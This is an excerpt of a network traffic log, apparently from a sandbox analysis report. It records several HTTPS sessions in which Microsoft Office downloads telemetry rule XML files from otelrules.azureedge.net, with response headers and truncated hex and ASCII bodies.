                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:13 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 8e1de54d-801e-007b-48d5-33e7ab000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153713Z-174f784596886s2bhC1EWR743w000000052000000000sa6u
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        131192.168.2.44988813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:14 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1425
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                                                                        x-ms-request-id: aedf2b6e-c01e-0046-18d5-332db9000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153714Z-174f7845968psccphC1EWRuz9s00000005d0000000009xc4
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        132192.168.2.44988913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:14 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1388
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 95c6c6ee-501e-0078-4dd5-3306cf000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153714Z-174f7845968frfdmhC1EWRxxbw000000052000000000srfu
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        133192.168.2.44989113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:14 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1378
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 22e16892-b01e-0070-78d5-331cc0000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153714Z-174f7845968frfdmhC1EWRxxbw000000053000000000qk5v
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        134192.168.2.44989013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:14 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 6193d0b2-701e-000d-6ed5-336de3000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153714Z-174f7845968j6t2phC1EWRcfe8000000059g00000000bq9w
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        135192.168.2.44989213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:14 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 8e1de6bc-801e-007b-1bd5-33e7ab000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153714Z-174f7845968vqt9xhC1EWRgten00000005700000000087y6
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        136192.168.2.44989713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:14 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:15 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1407
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5fef6650-301e-0051-3fd5-3338bb000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153715Z-174f78459685m244hC1EWRgp2c000000051g0000000040n0
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        137192.168.2.44989413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:15 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 64875b8c-901e-0067-68d5-33b5cb000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153715Z-174f7845968swgbqhC1EWRmnb400000005a0000000009cfk
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        138192.168.2.44989513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:15 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:15 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1415
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                                                                                                        x-ms-request-id: bdd760ac-701e-0053-09d5-333a0a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153715Z-174f7845968xlwnmhC1EWR0sv800000004w000000000qv8e
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
